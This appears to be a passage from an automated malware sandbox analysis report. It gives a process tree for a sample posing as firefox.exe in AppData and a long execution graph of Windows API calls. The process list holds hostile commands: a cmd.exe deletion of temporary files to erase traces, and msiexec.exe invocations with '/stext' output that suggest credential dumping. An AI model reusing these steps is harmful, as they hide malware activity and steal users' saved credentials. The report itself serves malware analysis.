Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:49:26
Start date:07/05/2018
Path:C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe'
Imagebase:0xfa0000
File size:531408 bytes
MD5 hash:52FFABA4273678BAE75442F2BC85B470
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:49:46
Start date:07/05/2018
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\dllhost.exe
Imagebase:0x390000
File size:7168 bytes
MD5 hash:A63DC5C2EA944E6657203E0C8EDEAF61
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:49:47
Start date:07/05/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c del /f /q %temp%\gif*
Imagebase:0x4aae0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:49:53
Start date:07/05/2018
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:'' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'
Imagebase:0x6b0000
File size:73216 bytes
MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:49:53
Start date:07/05/2018
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:'' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'
Imagebase:0x6b0000
File size:73216 bytes
MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:49:53
Start date:07/05/2018
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x30000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

Reset < >

    Execution Graph

    Execution Coverage:13.1%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:10.3%
    Total number of Nodes:1213
    Total number of Limit Nodes:31

    Graph

    execution_graph 8863 411bd2 8864 40ec58 13 API calls 8863->8864 8865 411bdd 8864->8865 8866 40404c 12 API calls 8865->8866 8867 411be2 8866->8867 8868 40c738 InterlockedExchange 8867->8868 8869 411c0a 8868->8869 8870 411c1a 8869->8870 8871 40ec58 13 API calls 8869->8871 8876 40c410 SetEndOfFile 8870->8876 8871->8870 8873 411c36 8874 402e20 12 API calls 8873->8874 8875 411c6d 8874->8875 8877 40c420 8876->8877 8878 40c427 8876->8878 8879 40c1e4 54 API calls 8877->8879 8878->8873 8879->8878 7992 410142 7993 4101b6 7992->7993 7994 4110ad 7993->7994 8006 406458 GetSystemInfo 7993->8006 7996 411039 8007 4036e4 GetKeyboardType 7996->8007 7999 411051 8010 403714 RegOpenKeyExW 7999->8010 8000 411056 8002 41105b GetCommandLineW 8000->8002 8014 4011c0 GetStartupInfoA 8002->8014 8006->7996 8008 4036f3 GetKeyboardType 8007->8008 8009 403706 8007->8009 8008->8009 8009->7999 8009->8000 8011 40378c 8010->8011 8012 40373f RegQueryValueExW 8010->8012 8011->8000 8013 40377b RegCloseKey 8012->8013 8013->8000 8015 4011dd GetACP GetCurrentThreadId 8014->8015 8016 40646c GetVersion 8015->8016 8017 406486 8016->8017 8017->7994 9426 401706 9427 401708 9426->9427 9428 40165c 2 API calls 9427->9428 9429 401719 9428->9429 9430 40172f VirtualFree 9429->9430 9433 401749 9429->9433 9432 401740 9430->9432 9431 401752 VirtualQuery VirtualFree 9431->9432 9431->9433 9433->9431 9433->9432 9434 4119ed 9435 411a12 9434->9435 9468 40eaa0 9435->9468 9437 411a70 9438 4030bc 2 API calls 9437->9438 9439 411a75 9438->9439 9441 40e414 24 API calls 9439->9441 9440 411a17 9440->9437 9442 40df20 13 API calls 9440->9442 9443 411a7d 9441->9443 9444 411a4c 9442->9444 9445 404c98 13 API calls 9443->9445 9447 411a54 MessageBoxW 9444->9447 9446 411a8a 9445->9446 9448 40b5d4 13 API calls 9446->9448 9447->9437 9449 411a61 9447->9449 9450 411a97 9448->9450 9451 409810 44 API calls 9449->9451 9452 40b348 13 API calls 9450->9452 9451->9437 9453 411aa7 9452->9453 9454 40b2e0 13 API calls 9453->9454 9455 411ab8 9454->9455 9456 405058 13 API calls 9455->9456 9457 411ac6 9456->9457 9458 404c98 13 API calls 9457->9458 9459 411ad6 9458->9459 9460 40c238 55 API calls 9459->9460 9461 411b15 9460->9461 9462 402e04 12 API calls 9461->9462 9463 411b35 9462->9463 9464 40c854 14 API calls 9463->9464 9465 411b77 9464->9465 9466 40cb34 54 API calls 9465->9466 9467 411b9e 9466->9467 9473 40e66c 9468->9473 9474 40e6b9 9473->9474 9480 40e68b 9473->9480 9475 40e6c1 9474->9475 9476 40e6c5 9474->9476 9477 40e6ce GetUserDefaultLangID 9475->9477 9479 40e6c3 9475->9479 9500 40bcb4 GetModuleHandleW 9476->9500 9477->9479 9482 40e69f 9479->9482 9483 40e640 GetLocaleInfoW 9479->9483 9480->9474 9480->9482 9490 407bdc 9480->9490 9484 40ea2c 9482->9484 9483->9479 9485 40ea35 9484->9485 9486 40ea76 9484->9486 9485->9486 9487 4049bc 12 API calls 9485->9487 9486->9440 9488 40ea56 9487->9488 9489 40e014 14 API calls 9488->9489 9489->9486 9491 407be0 9490->9491 9492 407bea 9490->9492 9491->9480 9493 407bee 9492->9493 9494 404e6c 13 API calls 9492->9494 9496 407c0c 9492->9496 9493->9480 9494->9496 9495 407c21 9498 4046e8 12 API calls 9495->9498 9499 407ccd 9495->9499 9496->9495 9497 404e6c 13 API calls 9496->9497 9497->9495 9498->9499 9499->9480 9501 406728 15 API calls 9500->9501 9502 40bce6 9501->9502 9503 40bcea 9502->9503 9504 40bd35 9502->9504 9505 40bcfd 9502->9505 9503->9479 9507 40bc8c RegOpenKeyExW 9504->9507 9516 40bc8c 9505->9516 9508 40bd4e 9507->9508 9509 40bd6b 9508->9509 9512 40bc80 15 API calls 9508->9512 9511 405058 13 API calls 9509->9511 9510 40bd16 9510->9509 9519 40bc80 9510->9519 9511->9503 9514 40bd62 RegCloseKey 9512->9514 9514->9509 9517 40bc97 9516->9517 9518 40bc9d RegOpenKeyExW 9516->9518 9517->9518 9518->9510 9522 40bb34 9519->9522 9521 40bc89 RegCloseKey 9521->9509 9523 40bb5a RegQueryValueExW 9522->9523 9525 40bba1 9523->9525 9529 40bb7d 9523->9529 9524 40bb97 9526 404c98 13 API calls 9524->9526 9525->9521 9526->9525 9527 409818 12 API calls 9527->9529 9528 404dd4 12 API calls 9528->9529 9529->9524 9529->9525 9529->9527 9529->9528 9530 4054ac 13 API calls 9529->9530 9531 40bbd4 RegQueryValueExW 9530->9531 9531->9523 9532 40bbf0 9531->9532 9532->9525 9533 404f00 13 API calls 9532->9533 9534 40bc30 9533->9534 9535 40bc42 9534->9535 9537 4054ac 13 API calls 9534->9537 9536 404c98 13 API calls 9535->9536 9536->9525 9537->9535 7982 405f23 lstrcpynW GetThreadLocale GetLocaleInfoW 7983 405f5b 7982->7983 7984 406060 7982->7984 7983->7984 7985 405f6d lstrlenW 7983->7985 7986 405f87 7985->7986 7986->7984 7987 405fe1 7986->7987 7988 405fbd lstrcpynW LoadLibraryExW 7986->7988 7987->7984 7989 405ffd lstrcpynW LoadLibraryExW 7987->7989 7988->7987 7989->7984 7990 406025 lstrcpynW LoadLibraryExW 7989->7990 7990->7984 8023 40acfb 8024 40acec SetErrorMode 8023->8024 8529 411c96 8530 411c9d SetLastError 8529->8530 8557 40e770 GetLastError 8530->8557 8532 411caa 8568 40404c 8532->8568 8534 411caf 8535 4068ec CreateWindowExW 8534->8535 8536 411ce8 SetWindowLongW 8535->8536 8537 4082d4 52 API calls 8536->8537 8538 411d44 8537->8538 8539 40b84c 14 API calls 8538->8539 8540 411d5a 8539->8540 8541 40513c 13 API calls 8540->8541 8542 411d6a 8541->8542 8543 40eb50 23 API calls 8542->8543 8545 411d7c 8543->8545 8544 411d8f 8547 411dc8 8544->8547 8549 40e5dc 9 API calls 8544->8549 8545->8544 8546 40ea2c 14 API calls 8545->8546 8546->8544 8548 411de1 8547->8548 8553 411ddb RemoveDirectoryW 8547->8553 8550 411dea DestroyWindow 8548->8550 8551 411df5 8548->8551 8549->8547 8550->8551 8552 411e1e 8551->8552 8554 405548 14 API calls 8551->8554 8553->8548 8555 411e14 8554->8555 8556 402e20 12 API calls 8555->8556 8556->8552 8571 407ee8 8557->8571 8560 40bf84 13 API calls 8561 40e7cb 8560->8561 8575 40def0 8561->8575 8564 409824 13 API calls 8565 40e7ef 8564->8565 8566 403f88 12 API calls 8565->8566 8567 40e7f4 8566->8567 8567->8532 8569 406588 12 API calls 8568->8569 8570 404051 8569->8570 8572 407efe 8571->8572 8579 404dc4 8572->8579 8576 40df0f 8575->8576 8582 40dd80 8576->8582 8578 40df18 8578->8564 8580 404d30 13 API calls 8579->8580 8581 404dd1 8580->8581 8581->8560 8583 404c98 13 API calls 8582->8583 8585 40ddb3 8583->8585 8584 40dde0 8584->8578 8585->8584 8586 40ddcc 8585->8586 8587 404dd4 12 API calls 8585->8587 8589 404f98 13 API calls 8585->8589 8588 404f98 13 API calls 8586->8588 8587->8585 8588->8584 8589->8585 8025 40c390 ReadFile 8026 40c3b0 8025->8026 8027 40c3c7 8025->8027 8028 40c3b6 GetLastError 8026->8028 8029 40c3c0 8026->8029 8028->8027 8028->8029 8030 40c1e4 54 API calls 8029->8030 8030->8027 8525 40c410 SetEndOfFile 8526 40c420 8525->8526 8527 40c427 8525->8527 8528 40c1e4 54 API calls 8526->8528 8528->8527 7677 40c42c WriteFile 7678 40c44c 7677->7678 7679 40c453 7677->7679 7683 40c1e4 GetLastError 7678->7683 7680 40c464 7679->7680 7686 40c130 7679->7686 7684 40c130 53 API calls 7683->7684 7685 40c1f5 7684->7685 7685->7679 7695 40bf84 FormatMessageW 7686->7695 7688 40c176 7702 409824 7688->7702 7692 40c185 7706 403f88 7692->7706 7697 40bfaa 7695->7697 7712 404dd4 7697->7712 7699 4082d4 7786 4082e8 7699->7786 7701 4082e3 7701->7688 7703 40982b 7702->7703 7704 404c98 13 API calls 7703->7704 7705 409843 7704->7705 7705->7692 7707 403f8c 7706->7707 7709 403f96 7706->7709 7708 4046b8 12 API calls 7707->7708 7708->7709 7711 403fd4 7709->7711 7979 402efc 7709->7979 7717 4054b4 7712->7717 7714 404de4 7722 4046c4 7714->7722 7718 4054b8 7717->7718 7719 4054ed 7717->7719 7718->7719 7726 402e04 7718->7726 7719->7714 7721 4054c7 7721->7714 7723 4046ca 7722->7723 7724 4046e5 7722->7724 7723->7724 7779 402e20 7723->7779 7724->7688 7724->7699 7727 402e1b 7726->7727 7729 402e08 7726->7729 7727->7721 7728 402e12 7728->7721 7729->7728 7731 402f39 7729->7731 7734 406588 7729->7734 7742 402f08 7731->7742 7735 4065bd TlsGetValue 7734->7735 7736 406597 7734->7736 7737 4065a2 7735->7737 7738 4065c7 7735->7738 7736->7731 7745 406544 7737->7745 7738->7731 7741 4065b6 7741->7731 7776 4046ac 7742->7776 7746 40654a 7745->7746 7747 406578 TlsGetValue 7746->7747 7748 406563 7746->7748 7755 4046b8 7746->7755 7747->7741 7759 406530 LocalAlloc 7748->7759 7751 40656a 7752 40656e 7751->7752 7753 40657a TlsSetValue 7751->7753 7754 4046b8 11 API calls 7752->7754 7753->7747 7754->7747 7756 4046ac 7755->7756 7760 404580 7756->7760 7759->7751 7762 404597 7760->7762 7766 4045a1 7760->7766 7761 4045b1 GetCurrentThreadId 7765 4045be 7761->7765 7770 4044f0 7762->7770 7764 402ec8 9 API calls 7764->7765 7765->7764 7767 404651 FreeLibrary 7765->7767 7768 404679 ExitProcess 7765->7768 7766->7761 7766->7765 7767->7765 7771 4044fa GetStdHandle WriteFile GetStdHandle WriteFile 7770->7771 7772 404551 7770->7772 7771->7766 7774 40456d 7772->7774 7775 40455a MessageBoxA 7772->7775 7774->7766 7775->7774 7777 404580 12 API calls 7776->7777 7778 402f13 7777->7778 7778->7721 7780 402e2e 7779->7780 7781 402e24 7779->7781 7780->7724 7781->7780 7782 406588 12 API calls 7781->7782 7783 402f39 7781->7783 7782->7783 7784 402f08 12 API calls 7783->7784 7785 402f5a 7784->7785 7785->7724 7787 4082f1 7786->7787 7788 408345 7787->7788 7807 404820 7787->7807 7791 408355 7788->7791 7792 40839c 7788->7792 7790 408372 7810 408274 7790->7810 7791->7790 7793 404820 13 API calls 7791->7793 7795 404820 13 API calls 7792->7795 7797 408397 7792->7797 7793->7790 7795->7797 7796 408447 7798 404dd4 12 API calls 7796->7798 7797->7796 7805 4083cf 7797->7805 7802 408445 7798->7802 7799 40843a 7800 404f00 13 API calls 7799->7800 7800->7802 7802->7701 7804 404820 13 API calls 7804->7805 7805->7799 7805->7804 7806 408274 52 API calls 7805->7806 7813 404c98 7805->7813 7847 404f00 7805->7847 7806->7805 7860 404e6c 7807->7860 7880 408540 7810->7880 7816 404cb8 7813->7816 7818 404c9c 7813->7818 7814 404ce8 7814->7805 7815 404ca8 7815->7816 7817 4054b4 12 API calls 7815->7817 7816->7814 7819 402e20 12 API calls 7816->7819 7817->7816 7818->7813 7818->7815 7820 404c98 13 API calls 7818->7820 7822 405082 7818->7822 7826 405051 7818->7826 7829 404faa 7818->7829 7819->7814 7820->7818 7821 4050c4 7823 4054b4 12 API calls 7821->7823 7821->7826 7824 4050a6 7822->7824 7825 404830 13 API calls 7822->7825 7828 4050da 7823->7828 7824->7821 7827 404830 13 API calls 7824->7827 7825->7824 7826->7805 7827->7821 7839 405112 7828->7839 7968 4046e8 7828->7968 7830 405021 7829->7830 7831 404fb5 7829->7831 7832 405031 7830->7832 7833 404830 13 API calls 7830->7833 7834 404fc1 7831->7834 7964 404830 7831->7964 7832->7826 7836 404f00 13 API calls 7832->7836 7833->7832 7838 404830 13 API calls 7834->7838 7842 404fe1 7834->7842 7841 404ffd 7836->7841 7837 404f00 13 API calls 7837->7841 7838->7842 7843 404c98 13 API calls 7839->7843 7845 40501c 7841->7845 7846 4046c4 12 API calls 7841->7846 7842->7826 7842->7837 7844 405123 7843->7844 7844->7805 7845->7805 7846->7845 7850 404f0d 7847->7850 7854 404f70 7847->7854 7848 4046c4 12 API calls 7851 404f61 7848->7851 7849 4054b4 12 API calls 7849->7854 7852 404f25 7850->7852 7853 404e6c 13 API calls 7850->7853 7855 404f64 7850->7855 7851->7805 7852->7855 7856 404f3e 7852->7856 7853->7852 7854->7848 7855->7849 7972 402e38 7856->7972 7858 404f46 7858->7851 7859 4046c4 12 API calls 7858->7859 7859->7851 7862 404dc4 7860->7862 7861 404e8e 7861->7861 7862->7861 7865 404d30 7862->7865 7864 40482a 7864->7788 7866 404d4b 7865->7866 7868 404d54 7865->7868 7866->7864 7867 404d8d 7870 404f00 13 API calls 7867->7870 7868->7867 7878 4047ec MultiByteToWideChar 7868->7878 7872 404d99 7870->7872 7871 404d76 7871->7867 7874 404d7c 7871->7874 7879 4047ec MultiByteToWideChar 7872->7879 7875 404dd4 12 API calls 7874->7875 7875->7866 7876 404daa 7877 404f00 13 API calls 7876->7877 7877->7866 7878->7871 7879->7876 7884 40856c 7880->7884 7881 408581 7899 408904 7881->7899 7884->7881 7886 40862e SysFreeString 7884->7886 7887 40867d 7884->7887 7886->7884 7888 40868e 7887->7888 7893 4086ec 7887->7893 7890 408798 7888->7890 7888->7893 7895 40886a 7888->7895 7889 408904 SysFreeString 7889->7893 7891 4087a1 7890->7891 7890->7893 7898 407cd8 7891->7898 7911 408500 7891->7911 7893->7889 7893->7898 7902 408480 7893->7902 7895->7893 7896 408897 7895->7896 7916 404b9c 7896->7916 7898->7884 7900 404a8c SysFreeString 7899->7900 7901 408289 7900->7901 7901->7797 7925 404c2c 7902->7925 7905 404b9c 4 API calls 7906 4084b4 7905->7906 7931 40822c 7906->7931 7908 4084d2 7935 404a8c 7908->7935 7912 408518 7911->7912 7915 40850c 7911->7915 7958 402f60 7912->7958 7915->7898 7917 404ba4 SysAllocStringLen 7916->7917 7918 404a8c 7916->7918 7921 404bb4 SysFreeString 7917->7921 7922 404a5c 7917->7922 7919 404a92 SysFreeString 7918->7919 7920 404aa0 7918->7920 7919->7920 7920->7898 7921->7898 7923 404a68 SysAllocStringLen 7922->7923 7924 404a78 7922->7924 7923->7922 7923->7924 7924->7898 7926 404c3a 7925->7926 7930 404c41 7925->7930 7938 404a64 7926->7938 7942 404a7c 7930->7942 7932 40823a 7931->7932 7945 407bb8 7932->7945 7936 404a92 SysFreeString 7935->7936 7937 404aa0 7935->7937 7936->7937 7937->7893 7939 404a68 SysAllocStringLen 7938->7939 7940 404a78 7938->7940 7939->7940 7941 404a5c 7939->7941 7940->7930 7941->7938 7943 404a82 SysFreeString 7942->7943 7944 404a88 7942->7944 7943->7944 7944->7905 7946 407bd1 7945->7946 7950 40991c 7945->7950 7948 403f88 12 API calls 7946->7948 7949 407bd6 7948->7949 7949->7908 7951 40992a 7950->7951 7952 4063e4 44 API calls 7951->7952 7953 409954 7952->7953 7954 4082d4 52 API calls 7953->7954 7955 409962 7954->7955 7956 404c98 13 API calls 7955->7956 7957 40996d 7956->7957 7957->7946 7959 402f14 7958->7959 7960 402f39 7959->7960 7961 406588 12 API calls 7959->7961 7962 402f08 12 API calls 7960->7962 7961->7960 7963 402f5a 7962->7963 7963->7898 7965 404848 7964->7965 7966 404836 7964->7966 7965->7834 7966->7965 7967 404820 13 API calls 7966->7967 7967->7965 7970 4046ee 7968->7970 7969 404714 7969->7839 7970->7969 7971 402e20 12 API calls 7970->7971 7971->7970 7973 402e3e 7972->7973 7974 402e50 7973->7974 7975 406588 12 API calls 7973->7975 7976 402f39 7973->7976 7974->7858 7975->7976 7977 402f08 12 API calls 7976->7977 7978 402f5a 7977->7978 7978->7858 7980 406588 12 API calls 7979->7980 7981 402f01 7980->7981 7981->7711 8031 4117dc 8064 4065d4 GetModuleHandleW 8031->8064 8037 411837 8038 41184c 8037->8038 8148 40ee68 8037->8148 8082 40b8fc 8038->8082 8041 411845 8043 4046ac 12 API calls 8041->8043 8042 411856 8044 404c98 13 API calls 8042->8044 8043->8038 8045 411863 8044->8045 8093 40c238 8045->8093 8047 41187b 8099 40ee14 FindResourceW 8047->8099 8052 4118f0 8112 40c1f8 8052->8112 8053 4118b2 8053->8052 8156 40ec58 8053->8156 8055 411916 8056 411932 8055->8056 8058 40ec58 13 API calls 8055->8058 8116 40c854 8056->8116 8058->8056 8059 411958 8132 40da38 8059->8132 8061 411983 8062 4119ce 8061->8062 8063 40da38 54 API calls 8061->8063 8063->8061 8065 406607 8064->8065 8167 4042d0 8065->8167 8068 40ed40 GetSystemInfo VirtualQuery 8069 40ee0b 8068->8069 8072 40ed6c 8068->8072 8075 40e894 8069->8075 8070 40edeb VirtualQuery 8070->8069 8070->8072 8071 40ed9c VirtualProtect 8071->8072 8073 40edb3 8071->8073 8072->8069 8072->8070 8072->8071 8074 40edd5 VirtualProtect 8072->8074 8073->8072 8074->8070 8450 40b89c GetCommandLineW 8075->8450 8077 40e97d 8077->8037 8078 40b8fc 15 API calls 8079 40e8b2 8078->8079 8079->8077 8079->8078 8080 407bdc 13 API calls 8079->8080 8081 40525c 13 API calls 8079->8081 8080->8079 8081->8079 8083 40b923 GetModuleFileNameW 8082->8083 8084 40b947 GetCommandLineW 8082->8084 8085 404dd4 12 API calls 8083->8085 8086 40b94e 8084->8086 8092 40b945 8085->8092 8087 40b954 8086->8087 8089 40b7bc 13 API calls 8086->8089 8090 40b95e 8086->8090 8474 404cec 8087->8474 8089->8086 8091 404c98 13 API calls 8090->8091 8091->8092 8092->8042 8094 40c242 8093->8094 8478 40c2e0 8094->8478 8095 40c271 8096 40c1e4 54 API calls 8095->8096 8097 40c287 8095->8097 8096->8097 8097->8047 8100 40ee2e SizeofResource 8099->8100 8101 40ee29 8099->8101 8103 40ee3b 8100->8103 8104 40ee40 LoadResource 8100->8104 8102 40ec58 13 API calls 8101->8102 8102->8100 8107 40ec58 13 API calls 8103->8107 8105 40ee4e 8104->8105 8106 40ee53 LockResource 8104->8106 8110 40ec58 13 API calls 8105->8110 8108 40ee5f 8106->8108 8109 40ee64 8106->8109 8107->8104 8111 40ec58 13 API calls 8108->8111 8109->8053 8153 40c738 8109->8153 8110->8106 8111->8109 8113 40c20c 8112->8113 8114 40c21c 8113->8114 8115 40c130 53 API calls 8113->8115 8114->8055 8115->8114 8117 40c861 8116->8117 8118 409824 13 API calls 8117->8118 8121 40c8ba 8117->8121 8119 40c8b5 8118->8119 8120 403f88 12 API calls 8119->8120 8120->8121 8122 40c738 InterlockedExchange 8121->8122 8123 40c8c7 8122->8123 8124 409824 13 API calls 8123->8124 8127 40c8e2 8123->8127 8125 40c8dd 8124->8125 8126 403f88 12 API calls 8125->8126 8126->8127 8128 409824 13 API calls 8127->8128 8129 40c925 8127->8129 8130 40c920 8128->8130 8129->8059 8131 403f88 12 API calls 8130->8131 8131->8129 8146 40dab4 8132->8146 8147 40da69 8132->8147 8133 40db01 8493 40cb34 8133->8493 8134 40cb34 54 API calls 8134->8147 8136 40cb34 54 API calls 8136->8146 8138 4049c4 12 API calls 8138->8146 8139 404f00 13 API calls 8139->8147 8140 4046c4 12 API calls 8141 40db2e 8140->8141 8141->8061 8142 4054ac 13 API calls 8142->8147 8144 404c98 13 API calls 8144->8147 8146->8133 8146->8136 8146->8138 8481 4049bc 8146->8481 8487 404718 8146->8487 8147->8134 8147->8139 8147->8142 8147->8144 8147->8146 8149 404cec 12 API calls 8148->8149 8150 40ee88 8149->8150 8151 40ee97 MessageBoxW 8150->8151 8152 40eeac 8151->8152 8152->8041 8521 40c6e4 8153->8521 8157 40ec84 8156->8157 8158 40ec66 8156->8158 8160 409824 13 API calls 8157->8160 8159 409824 13 API calls 8158->8159 8161 40ec7e 8159->8161 8162 40ec95 8160->8162 8163 403f88 12 API calls 8161->8163 8164 403f88 12 API calls 8162->8164 8165 40ec83 8163->8165 8166 40ec9a 8164->8166 8165->8052 8166->8052 8168 404308 8167->8168 8171 404268 8168->8171 8172 404278 8171->8172 8173 4042ab 8171->8173 8172->8173 8175 40bf84 13 API calls 8172->8175 8178 4015e4 VirtualAlloc 8172->8178 8180 4063e4 8172->8180 8186 405b48 8172->8186 8190 411648 8172->8190 8206 4110c4 8172->8206 8173->8068 8175->8172 8178->8172 8181 4063ec 8180->8181 8182 406439 8181->8182 8272 405b90 8181->8272 8182->8172 8185 404dd4 12 API calls 8185->8182 8187 405b58 GetModuleFileNameW 8186->8187 8189 405b74 8186->8189 8276 405de8 GetModuleFileNameW RegOpenKeyExW 8187->8276 8189->8172 8191 4116f7 8190->8191 8192 41166c GetModuleHandleW 8190->8192 8191->8172 8317 406728 8192->8317 8195 406728 15 API calls 8196 41169b 8195->8196 8326 40b9d0 GetSystemDirectoryW 8196->8326 8198 4116c5 8328 40b2e0 8198->8328 8200 4116d0 8336 404f98 8200->8336 8202 4116dd 8371 40ac84 SetErrorMode 8202->8371 8205 40bf84 13 API calls 8205->8191 8207 4110cc 8206->8207 8208 4110f2 GetModuleHandleW GetVersion 8207->8208 8211 411303 8207->8211 8209 41110d GetProcAddress 8208->8209 8210 41112b 8208->8210 8209->8210 8219 41111e 8209->8219 8212 411133 GetProcAddress 8210->8212 8213 4112da GetProcAddress 8210->8213 8211->8172 8216 411142 8212->8216 8214 4112f0 GetProcAddress 8213->8214 8215 4112e9 8213->8215 8214->8211 8217 4112ff SetProcessDEPPolicy 8214->8217 8215->8214 8444 40699c GetSystemDirectoryW 8216->8444 8217->8211 8219->8210 8220 411151 8221 404c98 13 API calls 8220->8221 8222 41115e 8221->8222 8222->8213 8223 411196 8222->8223 8224 404f98 13 API calls 8222->8224 8225 405058 13 API calls 8223->8225 8224->8223 8226 4111a9 8225->8226 8446 4069c8 SetErrorMode 8226->8446 8229 405058 13 API calls 8230 4111c4 8229->8230 8231 4069c8 2 API calls 8230->8231 8232 4111cc 8231->8232 8233 405058 13 API calls 8232->8233 8234 4111df 8233->8234 8235 4069c8 2 API calls 8234->8235 8236 4111e7 8235->8236 8237 405058 13 API calls 8236->8237 8238 4111fa 8237->8238 8239 4069c8 2 API calls 8238->8239 8240 411202 8239->8240 8241 405058 13 API calls 8240->8241 8242 411215 8241->8242 8243 4069c8 2 API calls 8242->8243 8244 41121d 8243->8244 8245 405058 13 API calls 8244->8245 8246 411230 8245->8246 8247 4069c8 2 API calls 8246->8247 8248 411238 8247->8248 8249 405058 13 API calls 8248->8249 8250 41124b 8249->8250 8251 4069c8 2 API calls 8250->8251 8252 411253 8251->8252 8253 405058 13 API calls 8252->8253 8254 411266 8253->8254 8255 4069c8 2 API calls 8254->8255 8256 41126e 8255->8256 8257 405058 13 API calls 8256->8257 8258 411281 8257->8258 8259 4069c8 2 API calls 8258->8259 8260 411289 8259->8260 8261 405058 13 API calls 8260->8261 8262 41129c 8261->8262 8263 4069c8 2 API calls 8262->8263 8264 4112a4 8263->8264 8265 405058 13 API calls 8264->8265 8266 4112b7 8265->8266 8267 4069c8 2 API calls 8266->8267 8268 4112bf 8267->8268 8269 405058 13 API calls 8268->8269 8270 4112d2 8269->8270 8271 4069c8 2 API calls 8270->8271 8271->8213 8274 405b9f 8272->8274 8275 405bb5 LoadStringW 8272->8275 8273 405b48 31 API calls 8273->8275 8274->8273 8274->8275 8275->8185 8277 405e8b 8276->8277 8278 405e2d RegOpenKeyExW 8276->8278 8296 405bec GetModuleHandleW 8277->8296 8278->8277 8279 405e4b RegOpenKeyExW 8278->8279 8279->8277 8281 405e69 RegOpenKeyExW 8279->8281 8281->8277 8283 405f23 lstrcpynW GetThreadLocale GetLocaleInfoW 8281->8283 8285 406060 8283->8285 8288 405f5b 8283->8288 8284 405ed0 RegQueryValueExW 8286 405eee RegCloseKey 8284->8286 8285->8189 8286->8189 8288->8285 8289 405f6d lstrlenW 8288->8289 8290 405f87 8289->8290 8290->8285 8291 405fe1 8290->8291 8292 405fbd lstrcpynW LoadLibraryExW 8290->8292 8291->8285 8293 405ffd lstrcpynW LoadLibraryExW 8291->8293 8292->8291 8293->8285 8294 406025 lstrcpynW LoadLibraryExW 8293->8294 8294->8285 8297 405c17 GetProcAddress 8296->8297 8298 405c5a 8296->8298 8297->8298 8299 405c2b 8297->8299 8300 405dac RegQueryValueExW 8298->8300 8308 405c90 8298->8308 8313 405bc8 8298->8313 8299->8298 8303 405c41 lstrcpynW 8299->8303 8300->8284 8300->8286 8301 405cb0 lstrcpynW 8309 405cc9 8301->8309 8303->8300 8305 405d98 lstrcpynW 8305->8300 8306 405bc8 CharNextW 8306->8308 8307 405bc8 CharNextW 8307->8309 8308->8300 8308->8301 8309->8300 8309->8305 8309->8307 8310 405cf7 lstrcpynW FindFirstFileW 8309->8310 8310->8300 8311 405d2c FindClose lstrlenW 8310->8311 8311->8300 8312 405d4e lstrcpynW lstrlenW 8311->8312 8312->8309 8314 405bd6 8313->8314 8315 405be4 8314->8315 8316 405bce CharNextW 8314->8316 8315->8300 8315->8306 8316->8314 8318 406755 8317->8318 8319 40674a GetProcAddress 8317->8319 8375 4048d4 8318->8375 8320 406775 8319->8320 8323 4046c4 12 API calls 8320->8323 8322 406764 8325 40676c GetProcAddress 8322->8325 8324 40678a GetModuleHandleW 8323->8324 8324->8195 8325->8320 8327 40b9f1 8326->8327 8327->8198 8329 40b2ea 8328->8329 8330 40b30e 8328->8330 8329->8330 8333 40b2fd 8329->8333 8331 404c98 13 API calls 8330->8331 8332 40b317 8331->8332 8332->8200 8408 405058 8333->8408 8335 40b30b 8335->8200 8341 405051 8336->8341 8347 404c98 8336->8347 8337 404faa 8339 405021 8337->8339 8340 404fb5 8337->8340 8338 404ce8 8338->8202 8342 404830 13 API calls 8339->8342 8348 405031 8339->8348 8344 404830 13 API calls 8340->8344 8350 404fc1 8340->8350 8341->8202 8342->8348 8343 404ca8 8346 404cb8 8343->8346 8349 4054b4 12 API calls 8343->8349 8344->8350 8345 404f00 13 API calls 8354 404ffd 8345->8354 8346->8338 8351 402e20 12 API calls 8346->8351 8347->8336 8347->8337 8347->8343 8347->8346 8356 405082 8347->8356 8357 404c98 13 API calls 8347->8357 8359 405127 8347->8359 8348->8341 8348->8345 8349->8346 8353 404830 13 API calls 8350->8353 8355 404fe1 8350->8355 8351->8338 8352 404f00 13 API calls 8352->8354 8353->8355 8358 40501c 8354->8358 8360 4046c4 12 API calls 8354->8360 8355->8341 8355->8352 8362 4050a6 8356->8362 8363 404830 13 API calls 8356->8363 8357->8347 8358->8202 8359->8359 8360->8358 8361 4054b4 12 API calls 8366 4050da 8361->8366 8364 404830 13 API calls 8362->8364 8365 4050c4 8362->8365 8363->8362 8364->8365 8365->8359 8365->8361 8367 405112 8366->8367 8368 4046e8 12 API calls 8366->8368 8369 404c98 13 API calls 8367->8369 8368->8367 8370 405123 8369->8370 8370->8202 8442 404d24 8371->8442 8374 40acd2 8374->8205 8377 404850 8375->8377 8376 40486a 8378 4046c4 12 API calls 8376->8378 8377->8376 8379 404873 8377->8379 8382 404871 8378->8382 8389 4047c0 8379->8389 8381 404893 8392 4049c4 8381->8392 8382->8322 8385 4048a4 8387 4047c0 WideCharToMultiByte 8385->8387 8386 4048c2 8388 4046c4 12 API calls 8386->8388 8387->8382 8388->8382 8390 4047cb 8389->8390 8391 4047d1 WideCharToMultiByte 8389->8391 